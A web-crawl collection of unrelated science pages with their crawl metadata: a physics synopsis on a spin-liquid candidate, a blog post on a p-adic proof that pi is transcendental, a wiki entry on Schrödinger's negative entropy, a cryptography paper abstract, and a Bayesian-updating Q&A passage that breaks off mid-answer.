antiferromagnet, designated DQVOF, which is unique from herbertsmithite and other similar compounds in that its magnetic properties stem from ions of vanadium, rather than copper. To better understand the material, Lucy Clark of the University of Edinburgh, UK, and colleagues studied the samples with muon spin relaxation experiments. Their data show an absence of spin freezing down to $40$ millikelvin, which is a clear spin liquid signature. Confirming DQVOF’s spin liquid status may require more detailed observations of its magnetic excitation spectrum. – Michael Schirber More Features » ### Announcements More Announcements » Magnetism ## Previous Synopsis Atomic and Molecular Physics ## Next Synopsis Quantum Information ## Related Articles Spintronics ### Synopsis: Material Covers All the Bases for Spintronic Memories Multilayer structures of cobalt and nickel have ideal properties for next-generation spintronic memory devices. Read More » Magnetism ### Viewpoint: Watching a Quantum Magnet Grow in Ultracold Atoms Two experiments watch an antiferromagnetic phase of matter emerge in ultracold Rydberg atoms, opening up a new platform for quantum simulation. Read More » Magnetism ### Synopsis: Magnetic Cloak Without Superconductors A new magnetic-cloak device works without requiring cryogenically cooled superconductors. Read More »
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 5, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5910567045211792, "perplexity": 3922.592732946527}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267156901.47/warc/CC-MAIN-20180921072647-20180921093047-00083.warc.gz"}
https://mattbaker.blog/2015/03/20/a-p-adic-proof-that-pi-is-transcendental/
# A p-adic proof that pi is transcendental Ferdinand von Lindemann In my last blog post, I discussed a simple proof of the fact that pi is irrational.  That pi is in fact transcendental was first proved in 1882 by Ferdinand von Lindemann, who showed that if $\alpha$ is a nonzero complex number and $e^\alpha$ is algebraic, then $\alpha$ must be transcendental.  Since $e^{i \pi} = -1$ is algebraic, this suffices to establish the transcendence of $\pi$ (and setting $\alpha = 1$ it shows that $e$ is transcendental as well).  Karl Weierstrass proved an important generalization of Lindemann’s theorem in 1885. The proof by Lindemann that pi is transcendental is one of the crowning achievements of 19th century mathematics.  In this post, I would like to explain a remarkable 20th century proof of the Lindemann-Weierstrass theorem due to Bezivin and Robba [Annals of Mathematics Vol. 129, No. 1 (Jan. 1989), pp. 151-160], which uses p-adic analysis in a key way.  Their original argument was made substantially more elementary by Beukers in this paper; we refer the reader to [American Mathematical Monthly Vol. 97 Issue 3 (Mar. 1990), pp. 193-197] for a lovely exposition of the resulting proof, which rivals any of the usual approaches in its simplicity.  But I’d like to focus here on the original Bezivin-Robba proof, which deserves to be much better known than it is.  In the concluding remarks, we will briefly discuss a 21st century theorem of Bost and Chambert-Loir that situates the Bezivin-Robba approach within a much broader mathematical framework. An equivalent assertion Let $\overline{{\mathbb Q}}$ be the subfield of ${\mathbb C}$ consisting of all complex numbers which are algebraic (over ${\mathbb Q}$).  The Lindemann-Weierstrass theorem is the following statement: (L-W) Let $\alpha_1,\ldots,\alpha_m \in \overline{{\mathbb Q}}$ be distinct algebraic numbers.  Then $e^{\alpha_1},\ldots,e^{\alpha_m}$ are linearly independent over $\overline{{\mathbb Q}}$. A relatively simple argument shows that (L-W) is equivalent to a rather different-looking assertion about formal power series which are represented by rational functions. It will be convenient to work with power series expansions around infinity rather than zero.  Recall that a function $f : {\mathbb C} \to {\mathbb C}$ is analytic at $\infty$ if the function $g(w) = f(1/w)$ is analytic at $w=0$.  If $g(w)=b_0 + b_1 w + b_2 w^2 + \cdots$ is the power series expansion for $g(w)$ around $0$, we call $f(z) = b_0 + b_1 \frac{1}{z} + b_2 \frac{1}{z^2} + \cdots$ the power series expansion for $f(z)$ around $z=\infty$.  We will be particularly interested in functions $f(z)$ for which $b_0 = 0$ (i.e., which vanish at infinity). We say that a formal power series $v(x) \in {\mathbb C}[[\frac{1}{x}]]$ is analytic at $\infty$ if the power series $u(w) := v(1/w)$ has a nonzero radius of convergence around $w=0$.  And by abuse of terminology, we say that $v(x)$ is a rational function if there are polynomials $P(x),Q(x)$ with $Q(x)$ not identically zero such that the power series expansion of $f(x)=\frac{P(x)}{Q(x)}$ around $x=\infty$ is equal to $v(x)$.  A rational function vanishes at infinity if and only if ${\rm deg}(P) < {\rm deg}(Q)$. Let $K$ be a field, and let ${\mathcal F}_K := \frac{1}{x}K[[\frac{1}{x}]]$ be the ring of formal power series over $K$ in $\frac{1}{x}$ which vanish at infinity.  Let ${\mathcal D} : {\mathcal F}_{\mathbb C} \to {\mathcal F}_{\mathbb C}$ be the differential operator ${\mathcal D}(v) = v + v'$.  We will show that (L-W) is equivalent to the following statement: (B-R) If $v \in {\mathcal F}_{\mathbb Q}$ is analytic at infinity and ${\mathcal D}(v)$ is a rational function, then $v$ is also a rational function. Note that the conclusion of (B-R) can fail for functions with an essential singularity at infinity; for example, ${\mathcal D}(e^{-x}) = 0$ but $e^{-x}$ is not a rational function. Proof of the equivalence The proof that (L-W) and (B-R) are equivalent is based on properties of the Laplace transform.  Define the formal Laplace transform ${\mathcal L} : {\mathbb C}[[z]] \to {\mathcal F}_{\mathbb C}$ by ${\mathcal L}(\sum_{n=0}^\infty a_n z^n) = \sum_{n=0}^\infty \frac{n! a_n}{x^{n+1}}.$ (This is just the extension of the usual Laplace transform to the setting of formal power series.)  The map ${\mathcal L} : {\mathbb C}[[z]] \to {\mathcal F}_{\mathbb C}$ is clearly a bijection. We will make use of the following standard facts from complex analysis: (L1) $f(z) \in {\mathbb C}[[z]]$ defines an entire function of exponential growth (i.e. $|f(z)| \leq C_1 e^{C_2 |z|}$ for some $C_1, C_2$) if and only if ${\mathcal L}(f)$ is analytic at infinity. (L2) $f(z) \in {\mathbb C}[[z]]$ is the power series expansion around $z=0$ of an exponential polynomial $p_1(z)e^{a_1 z} + \cdots + p_n(z)e^{a_n z}$ if and only if ${\mathcal L}(f)$ is a rational function.  This gives a bijection between exponential polynomials and rational functions vanishing at infinity. The proof of (L2), which is based on the partial fractions decomposition of rational functions and the fact that ${\mathcal L}(e^{az}) = \frac{1}{1-ax}$, shows that $p_i(z) \in \overline{{\mathbb Q}}[z]$ and $a_i \in \overline{{\mathbb Q}}$ for all $i$ if and only if ${\mathcal L}(f) \in \overline{{\mathbb Q}}(x).$ We will also need the following lemma, whose proof we leave as an exercise: Lemma: Define $\delta : {\mathbb C}[[z]] \to {\mathbb C}[[z]]$ by $\delta(f(z)) = (z-1)f(z)$, and let ${\mathcal D} : {\mathcal F}_{\mathbb C} \to {\mathcal F}_{\mathbb C}$ be as above.  Then $\delta$ and ${\mathcal D}$ are bijections, and ${\mathcal D}({\mathcal L}(f))= {\mathcal L}(\delta(f)).$ To see that (L-W) implies (B-R), suppose $v \in {\mathcal F}_{\mathbb Q}$ is analytic at infinity and ${\mathcal D}(v)$ is a rational function.  By (L2), there is an exponential polynomial $f(z)= \sum p_i(z) e^{\alpha_i z}$ with the $\alpha_i$ distinct algebraic numbers and $p_i(z) \in \overline{{\mathbb Q}}[z]$ such that ${\mathcal L}(f) = {\mathcal D}(v)$.  The function $g(z) := \frac{f(z)}{z-1}$ satisfies $\delta(g(z)) = f(z)$, so by the Lemma we have ${\mathcal L}(g)=v$.  As $v$ is analytic at infinity, we know by (L1) that $g$ is entire, and hence $f(1)=0$.  By (L-W), we must have $p_i(1)=0$, i.e. $(z-1) \mid p_i(z)$, for all $i$.  Thus $g(z)$ is also an exponential polynomial, which implies by (L2) that $v(x)$ is a rational function. To see that (B-R) implies (L-W), assume for the sake of contradiction that $f(1)=0$, where $f(z) := \sum_{i=1}^m \beta_i e^{\alpha_i z}$, the $\alpha_i$ are distinct and algebraic, and the $\beta_i$ are algebraic and nonzero. Replacing $f(z)$ by the product of its Galois conjugates $\sum_{i=1}^m \sigma(\beta_i) e^{\sigma(\alpha_i) z}$, we may assume without loss of generality that the power series expansion of $f(z)$ lies in ${\mathbb Q}[[z]]$.  (This is a standard reduction which appears in many proofs of (L-W).)  The Laplace transform of $f(z)$ is ${\mathcal L}(f) = \sum \frac{\beta_i}{1-\alpha_i x},$ which has only simple poles. Moreover, since the $\alpha_i$ are distinct and $f(1)=0$ we must have $m \geq 2$ and some $\alpha_i$ is non-zero; thus ${\mathcal L}(f)$ has at least one simple pole. On the other hand, since $f(1)=0$, the function $g(z) := \frac{f(z)}{z-1}$ is entire and of exponential growth, so by (L1) $v := {\mathcal L}(g) \in {\mathcal F}_{\mathbb C}$ is analytic at infinity.  The Lemma tells us that ${\mathcal L}(f) = {\mathcal D}(v)$, so ${\mathcal D}(v)$ has only simple poles.  However, it is easy to see that if $u$ is a rational function then ${\mathcal D}(u) = u + u'$ can never have a simple pole.   Thus $v$ is not a rational function, contradicting (B-R). Rationality of formal power series In order to prove (B-R), we need to show that if $v \in {\mathcal F}_{\mathbb Q}$ is analytic at infinity and ${\mathcal D}(v)$ is a rational function, then $v$ is also a rational function.  For this, we need some kind of robust criterion for determining whether a formal power series with coefficients in ${\mathbb Q}$ represents a rational function.  There is a long history of such results culminating in what one might call the Borel-Polya-Dwork-Bertrandias criterion, which will turn out to be exactly what we need.  We interrupt our regularly scheduled proof to give a brief history of these developments. Borel Around 1894, Emile Borel noticed that if $f(z)=\sum_{n=0}^\infty a_n z^n$ is a power series with integer coefficients defining an analytic function on a closed disc of radius $R > 1$ in ${\mathbb C}$, then $f(z)$ must in fact be a polynomial.  This is a simple consequence of Cauchy’s integral formula, which shows that if $|f| \leq M$ on the disc then $|a_n| < \frac{M}{2\pi R^{n+1}}$.  Since the $a_n$ are assumed to be integers, the inequality implies that $a_n = 0$ for all sufficiently large $n$. Borel extended this argument to show: Theorem (Borel): If $f(z)=\sum_{n=0}^\infty a_n z^n$ is the power series expansion around $z=0$ of a meromorphic function on a closed disc of radius $R > 1$ in ${\mathbb C}$, and the coefficients $a_n$ are all integers, then $f(z)$ is a rational function. The proof is based on the following well-known characterization of rational functions, whose proof we omit (see Lemma 9 in this blog post by Terry Tao): Lemma (Kronecker): Let ${\mathbf a} = \{ a_n \}_{n \geq 0}$ be a sequence of complex numbers.  Then the following are equivalent: (R1) $f(z) =\sum_{n=0}^\infty a_n z^n$ represents a rational function. (R2) The Kronecker-Hankel determinant $K_N({\mathbf a}) = \begin{vmatrix} a_0 & a_1 & a_2 & \dots & a_N \\ a_1 & a_2 & a_3 & \dots & a_{N+1} \\ \hdotsfor{5} \\ a_N & a_{N+1} & a_{N+2} & \dots & a_{2N} \end{vmatrix}$ is zero for $N$ sufficiently large. The idea behind the proof of the more general result of Borel is to use the above Cauchy estimate (applied to the product of $f(z)$ with some polynomial), together with standard facts about determinants, to show that if $f$ is meromorphic on a closed disc of radius $R > 1$ then $K_N({\mathbf a}) \to 0$ as $N \to \infty$.  If the $a_n$ are all integers, this forces $K_N({\mathbf a}) = 0$ for $N$ sufficiently large. Polya Around 1916, George Polya realized that the proof of Borel’s theorem via Kronecker-Hankel determinants could be generalized by replacing the radius of convergence with the transfinite diameter of the region of convergence. The transfinite diameter is a measure of the size of a set which generalizes the radius of a disc.  It has many uses in complex analysis and potential theory (as well as in number theory).  The diameter of a bounded set $A$ in some metric space $X$ is the maximum distance between two points of $A$, and one can generalize this to the $N^{\rm th}$ diameter $\delta_N(A)$, which by definition is the supremum over all $N$-tuples $(z_1,\ldots,z_N) \in A^N$ of the geometric mean of the pairwise distances between the $z_i$: $\delta_N(A) = \sup_{z_1,\ldots,z_N \in A} \left( \prod_{i \neq j} |z_i - z_j| \right)^{\frac{1}{n(n-1)}}.$ It turns out that $\{ \delta_N \}_{N \geq 2}$ forms a monotonically decreasing sequence and thus one can define the transfinite diameter $\delta_\infty(A) := \lim_{N \to \infty} \delta_N(A).$ The transfinite diameter of a disc in any algebraically closed normed field (e.g. ${\mathbb C}$) is its radius, and the transfinite diameter of a real line segment is one-quarter of its length. It will be convenient for the statement of Polya’s theorem, and for our application to the Lindemann-Weierstrass theorem, to work with $g(z) = \frac{1}{z} f(\frac{1}{z})$ instead of $f(z)$ in Borel’s theorem, and to study the transfinite diameter of the complement of the region of convergence. Theorem (Polya): If $g(z)=\sum_{n=0}^\infty \frac{a_n}{z^{n+1}}$ is a power series with integer coefficients which can be continued to a meromorphic function on the complement of a bounded set $A \subset {\mathbb C}$ containing $0$ with $\delta_\infty(A) < 1$, then $g(z)$ is a rational function. The condition $\delta_\infty(A) < 1$ in Polya’s theorem is sharp: the series $g(z) = \sum_{n=0}^\infty \binom{2n}{n} z^n$ has integer coefficients and can be extended to the analytic function $\sqrt{1 - \frac{4}{z}}$ on the complement of the real segment $[0,4]$, which has transfinite diameter equal to 1.  However, $\sqrt{1 - \frac{4}{z}}$ is not a rational function. Dwork Bernard Dwork noticed around 1960 that Borel’s theorem has a $p$-adic analogue, and this observation is a key ingredient in Dwork’s famous proof of Weil’s conjecture that the zeta function of an algebraic variety over a finite field is a rational function.  Dwork realized, in fact, that one could deduce both Borel’s theorem and its $p$-adic analogue from the following global result.  (For the statement, we let ${\mathbb C}_v$ denote the completion of an algebraic closure of the $v$-adic completion of ${\mathbb Q}$.  For $v = \infty$ this is just ${\mathbb C}$; for $v$ corresponding to a prime number $p$ it is a p-adic analogue of the complex numbers.) Theorem (Dwork): Suppose $f(z)=\sum_{n=0}^\infty a_n z^n$ is a power series with rational coefficients. Let $S$ be a finite set of places of ${\mathbb Q}$, containing the infinite place, such that: (D1) For $p \not\in S$, $|a_n|_p\leq 1$ for all $n \geq 0$ (i.e., $a_n$ is a $p$-adic integer). (D2) For $v \in S$, $f(z)$ extends to a meromorphic function on a disc $D_v$ of radius $R_v$ in ${\mathbb C}_v$ and $\prod_{v \in S} R_v > 1$. Then $f(z)$ is a rational function. The proof of Dwork’s theorem in the special case where $f$ is analytic (rather than just meromorphic) in each $D_v$ is not difficult.  In this case, for $v \in S$ corresponding to a prime number $p$, the $p$-adic convergence of $f$ on $D_p$ means that $|a_n| R_p^n \to 0$ as $n \to \infty$.  This implies that there is a constant $M_p$ such that $|a_n|_p \leq \frac{M_p}{R_p^{n+1}}$ for all $n$.  And as above, the Cauchy estimate implies that $|a_n|_\infty \leq \frac{M_\infty}{R_\infty^{n+1}}$ for some constant $M_\infty$.  Thus (setting $M = \prod_{v \in S} M_v$ and $R = \prod_{v \in S} R_v$) $\prod_{v \in S} |a_n|_v \leq \frac{M}{R^{n+1}} \to 0$ as $n \to \infty$.  On the other hand, the product formula shows that if $a_n \neq 0$ then $\prod_{v \in S} |a_n|_v \geq \prod_{{\rm all \;} v} |a_n|_v = 1.$ It follows that $a_n = 0$ for $n$ sufficiently large, and $f$ is a polynomial. Bertrandias The transfinite diameter makes sense in any metric space, and in particular we can define it for subsets of the “p-adic complex numbers” ${\mathbb C}_p$.  Bertrandias put several of the above ingredients together and proved the following common generalization of the theorems of Borel, Polya, and Dwork around 1963. Theorem (Bertrandias): Let $g(z)=\sum_{n=0}^\infty \frac{a_n}{z^{n+1}}$ with $a_n \in {\mathbb Q}$ for all $n \geq 0$.  Let $S$ be a finite set of places of ${\mathbb Q}$, containing the infinite place, such that: (B1) For $p \not\in S$, $|a_n|_p \leq 1$ for all $n \geq 0$ (i.e., $a_n$ is a $p$-adic integer). (B2) For $v \in S$, $g(z)$ extends to a meromorphic function on the complement of a bounded set $K_v \subset {\mathbb C}_v$ (which is assumed to be a finite union of discs if $v$ is non-Archimedean) and $\prod_{v \in S} \delta_\infty(K_v) < 1$. Then $g(z)$ is a rational function. The proof is based on Kronecker-Hankel determinants and the product formula, like the proof of Dwork’s theorem above.  For simplicity we have assumed that the $a_n$ lie in ${\mathbf Q}$, but the statement and proof of Bertrandias’s theorem generalize easily to any number field $K$.  We will only use the special case of the theorem of Bertrandias in which each extension of $g(z)$ is assumed to be analytic. The proof of assertion (B-R) We are finally ready to explain Bezivin and Robba’s proof of assertion (B-R), which as we have seen implies the Lindemann-Weierstrass theorem (and hence the transcendence of $\pi$).  Perhaps the most interesting aspect of the proof is that it is the p-adic places which will be used to verify the hypotheses of Bertrandias’s theorem. Let $\omega(x)= v(x) + v'(x)$, which by assumption is a rational function, and let $\omega(x) = \sum_{i,j} \frac{c_{ij}}{(x - \gamma_i)^j}$ be the partial fraction expansion for $\omega$, where $\gamma_1,\ldots,\gamma_m$ are distinct algebraic numbers. Using the formal inverse $(I + \frac{d}{dx})^{-1} = \sum_{k \geq 0} (-1)^k \frac{d^k}{dx^k}$ for ${\mathcal D}$, one verifies easily that $v$ has the following explicit partial fraction expansion: (*) $v(x) = \sum_{i,j} c_{ij} \sum_{k \geq 0} \binom{k+j-1}{j-1} \frac{k!}{(x - \gamma_i)^{k+j}}.$ Let $S_1$ be a finite set of places of ${\mathbb Q}$ containing the Archimedean place such that for $p \not\in S_1$, all of the nonzero $c_{i,j}$ and $\gamma_i$ have p-adic absolute value 1, and such that $|\gamma_i - \gamma_j|_p = 1$ for all $i \neq j$.  The explicit formula (*) shows that for $p \not\in S_1$ the coefficients $a_n$ of $v(x) = \sum_{n \geq 0} \frac{a_n}{x^{n+1}}$ are $p$-adic integers.  Thus $v(x)$ satisfies hypothesis (B1) for any set of places $S$ containing $S_1$. For $v \in S_1$, formula (*) shows that the series defining $v(x)$ converges outside a disc $K_v \subset {\mathbb C}_v$ of some positive radius $R_v$. For $p \not\in S_1$, formula (*) shows that the series defining $v(x)$ converges in the complement of a set $K_p \subset {\mathbb C}_p$ which is a union of discs $D_i$ centered at the various $\gamma_i$.  Since the series $\sum_{k=0}^\infty k! x^k$ has p-adic radius of convergence equal to $p^{\frac{1}{p-1}}$, we can take the radii of the discs $D_i$ to be $p^{-\frac{1}{p-1}}$.  By our assumptions on $S_1$, the discs $D_1,\ldots D_m$ are distinct, and it is a simple exercise using the non-Archimedean triangle inequality to prove that $\delta_\infty \left( \bigcup_{i=1}^m D_i \right) = p^{-\frac{1}{m(p-1)}}.$ Since the series $\sum_{{\rm primes \;} p} \frac{1}{p \log p}$ diverges, the infinite product $\prod_{p \not\in S_1} \delta_\infty(K_p)$ diverges to zero.  Thus there exists a set of places $S$ containing $S_1$ such that $\prod_{v \in S} \delta_\infty(K_v) < 1.$ For this choice of $S$, $v(x)$ satisfies both (B1) and (B2) and thus $v(x)$ is a rational function.  Q.E.D. Concluding remarks 1. My formulation of (B-R), and the accompanying exposition of the proof that (L-W) and (B-R) are equivalent, differs a bit from Bezivin and Robba’s.   They work with power series $u(x) \in {\mathbb C}[[x]]$ and the differential operator ${\mathcal D}'(u) = x^2 u' + (x-1) u$ instead, which amounts to the same thing via the transformation $v(x) = \frac{1}{x} u(\frac{1}{x})$.  (I thank Xander Flood for helping me with the details of how to translate smoothly between the two settings.) 2. In their paper, Bezivin and Robba generalize assertion (B-R) to an arbitrary linear differential operator ${\mathcal D}$ with polynomial coefficients for which $\infty$ is a totally irregular singular point.  In the special case ${\mathcal D}(v) = v' + v$, the proof is significantly simpler than the general case because one has an explicit inverse operator.  In the general case, one needs to use techniques from the theory of $p$-adic differential equations to establish the properties (B1) and (B2). 3. The converses of the theorems of Borel, Polya, Dwork, and Bertrandias are clearly true as well, so these results give a precise characterization of rational functions among formal power series of a certain type. 4. A proof of the theorem of Bertrandias appears in Chapter 5 of Amice’s unfortunately out-of-print book Les Nombres p-adiques. 5. For a deeper understanding of p-adic transfinite diameters, it is very useful to work with Berkovich spaces.  See for example my book with Robert Rumely, in which we prove (as in the classical case) that the transfinite diameter of a compact set $K \subset {\mathbf A}^1_{\rm Berk}$ coincides with its capacity, defined in terms of a probability measure of minimum energy supported on $K$. 6. The theorem of Bost and Chambert-Loir mentioned in the introduction is a generalization of the theorem of Bertrandias giving a criterion for a formal meromorphic function on an algebraic curve to be the germ of a rational function.  The proof uses Arakelov geometry.  Bost and Chambert-Loir view their theorem, and its proof, as an arithmetic counterpart of the following theorem from algebraic geometry: Theorem (Hartshorne): Let $X$ be a complex projective surface and $H$ an ample effective divisor on $X$.  Then any formal meromorphic function along $H$ is the restriction of a rational function on $X$. For more details and background related to the theorem of Bost and Chambert-Loir, see http://www.math.u-psud.fr/~chambert/publications/pdf/toronto2008.pdf
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 293, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9879916310310364, "perplexity": 158.83278290727222}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-30/segments/1500549424945.18/warc/CC-MAIN-20170725002242-20170725022242-00438.warc.gz"}
http://www.eoht.info/page/Negative%20entropy
In animate thermodynamics, negative entropy is a mathematical synonym for order, in an entropic sense. The term comes from Austrian physicist Erwin Schrödinger's famous 1944 booklet What is Life?, wherein he tried to explain the second law to a lay audience, stating that negative entropy is the amount of order that an organism "sucks from its environment" as its lives or "avoids decay to thermodynamical equilibrium or of maximum entropy". [1] Mathematics The idea of the verbal expression 'negative entropy' being synonymous to 'order' stems from a combination of the following three expressions: $\frac{1}{X} = X^{-1} \,\!$ Rule for inverse functions $\log(a^b) = b \log(a) \,\!$ Rule for logarithms $S = k \log W \!$ Entropy expression from statistical mechanics. In short, Schrodinger equates the multiplicity W of the Boltzmann entropy equation with disorder, pure and simple, which he reasons applied to all systems; then equates the inverse of multiplicity with order, as in: $W^{-1} = Order \,\!$ then carries the negative sign over to the left side of the statistical entropy expression, using the rule for logarithms, to argue that negative S equals order. Derivation In his 1944 book What is Life?, Schrödinger reasoned that it is not energy that living beings feed on that keeps them at bay from decay but “negative entropy”. In rephrasing this statement, he says “the essential thing in metabolism is that the organism succeeds in freeing itself from all the entropy it cannot help producing while alive.” In making these ball-park statements, Schrödinger calls on the statistical concept of order and disorder, connections that were revealed, as he says, by the investigations of Boltzmann and Gibbs in statistical physics. On this basis, he situates the following definition: where k is the Boltzmann constant and D, he says, is a “quantitative measure of the atomistic disorder of the body in question”. Here, to note, Schrodinger fails to mention that this expression is generally valid only for ideal gases. In any event, Schrödinger reasons that this statistical expression applies to living organisms. Moreover, to make is verbal argument mathematical, he states that “if D is a measure of disorder, its reciprocal, 1/D, can be regarded as a direct measure of order.” In addition, “since the logarithm of 1/D is just the minus of the logarithm of D, we can write can write Boltzmann’s equation thus: or Hence, as Schrödinger states: “The awkward expression negative entropy can be replaced by a better one: entropy, taken with the negative sign [ – entropy], is itself a measure of order.” Thus, he concludes “the device by which an organism maintains itself stationary at a fairly high level of orderliness”, a state he equates with a low level of entropy, consists in “sucking orderliness from its environment”. Negentropy In 1953, through the guise of information theory, Schrödinger's negative entropy usage was shortened into the term "negentropy" by French physicist Léon Brillouin. [2] Difficulties After his lecture, wherein he discussed negative entropy, Schrodinger famously had to add a note to Chapter 6, where explains that: “My remarks on negative entropy have met with doubt and opposition from physicist colleagues.” He goes on to explain that had he been lecturing to them, he would have turned the discussion to free energy, but judged the concept too intricate for the lay audience. In a 1946 review of Schrödinger’s What is Life?, author H.J. Muller stated, supposedly, that biologists have, in the previous decades, commonly defined negative entropy as "potential energy". [3] Muller, it seems, is referring here to Schrodinger's note on free energy. When concept of negative entropy is taken literally and measured in actual organisms, the concept looses its meaning, and a move to free energy discussions prevails. [4]
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 4, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8068132400512695, "perplexity": 1988.2447456649224}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320303385.49/warc/CC-MAIN-20220121131830-20220121161830-00002.warc.gz"}
https://www.iacr.org/cryptodb/data/paper.php?pubkey=29161
## CryptoDB ### Paper: A Framework for Achieving KDM-CCA Secure Public-Key Encryption Authors: Fuyuki Kitagawa Keisuke Tanaka DOI: 10.1007/978-3-030-03329-3_5 Search ePrint Search Google Slides ASIACRYPT 2018 We propose a framework for achieving a public-key encryption (PKE) scheme that satisfies key dependent message security against chosen ciphertext attacks (KDM-CCA security) based on projective hash function. Our framework can be instantiated under the decisional diffie-hellman (DDH), quadratic residuosity (QR), and decisional composite residuosity (DCR) assumptions. The constructed schemes are KDM-CCA secure with respect to affine functions and compatible with the amplification method shown by Applebaum (EUROCRYPT 2011). Thus, they lead to PKE schemes satisfying KDM-CCA security for all functions computable by a-priori bounded size circuits. They are the first PKE schemes satisfying such a security notion in the standard model using neither non-interactive zero knowledge proof nor bilinear pairing. The above framework based on projective hash function captures only KDM-CCA security in the single user setting. However, we can prove the KDM-CCA security in the multi user setting of our concrete instantiations by using their algebraic structures explicitly. Especially, we prove that our DDH based scheme satisfies KDM-CCA security in the multi user setting with the same parameter setting as in the single user setting. ##### BibTeX @inproceedings{asiacrypt-2018-29161, title={A Framework for Achieving KDM-CCA Secure Public-Key Encryption}, booktitle={Advances in Cryptology – ASIACRYPT 2018}, series={Lecture Notes in Computer Science}, publisher={Springer}, volume={11273}, pages={127-157}, doi={10.1007/978-3-030-03329-3_5}, author={Fuyuki Kitagawa and Keisuke Tanaka}, year=2018 }
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2942115068435669, "perplexity": 5227.253244769945}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057558.23/warc/CC-MAIN-20210924140738-20210924170738-00243.warc.gz"}
https://stats.stackexchange.com/questions/424702/does-order-of-events-matter-in-bayesian-update
# Does order of events matter in Bayesian update? I'm wondering whether the order of events can lead to different Bayesian update. For example, consider a coin-tossing problem with unknown $$p$$, the probability of Head. Initially, $$p$$ is known to follow some beta distribution: $$p\sim Beta(a_0,b_0).$$ Suppose that we have a sequence of observations that do not have to be an outcome of coin-tossing. For example, the first observation is "$$\mathbb E[p]>\frac{1}{2}$$" while the second observation is "Head". If I want to update $$p$$ using Baye's rule, it will be a lot easier if I can process the second event first and then the first event later as Beta is a conjugate prior of binomial experiments. However, if I have to update $$p$$ in the order of the events (first observation first, and then the second one later), the process requires a bit more of computation. So, my question is that does the order of events matter in Bayesian updating? If not, what can be a theoretical background that justifies it? • How can you observe that "$\mathbb E[p]>\frac{1}{2}$"? Nov 28, 2019 at 1:37 AFAIK, you cannot say that $$p > \frac{1}{2}$$ or even $$\mathbb E[p]>\frac{1}{2}$$ is an "observation" or "event", but rather a constraint on your model parameter(s). The term "observation" is usually reserved for specific realizations of a random variable (i.e. draws from a distribution). In your model, one could plausibly observe $$p$$ (numbers between 0 and 1) or the outcomes of $$Bernoulli(p)$$ (either 0 or 1). There is no way to observe $$\mathbb E[p]>\frac{1}{2}$$, this information lies outside your probabilistic model. As a rough rule (some caveats apply) you should be able to simulate observations from your probabilistic model, given model parameters. How would you simulate a model where $$\mathbb E[p]>\frac{1}{2}$$ is a possible observation? If you start with the $$p\sim Beta(a_0,b_0); a_0, b_0 \in \mathbb{R}^+$$ model and then learn that $$\mathbb E[p]>\frac{1}{2}$$, it means your initial model was incorrect and you should change your model to reflect the constraint ($$\mathbb E[p]>\frac{1}{2}$$ implies $$\frac{a_0}{a_0 + b_0} > \frac{1}{2}$$, so some combinations of $$a_0$$ and $$b_0$$ are ruled out). Adding a constraint cannot be 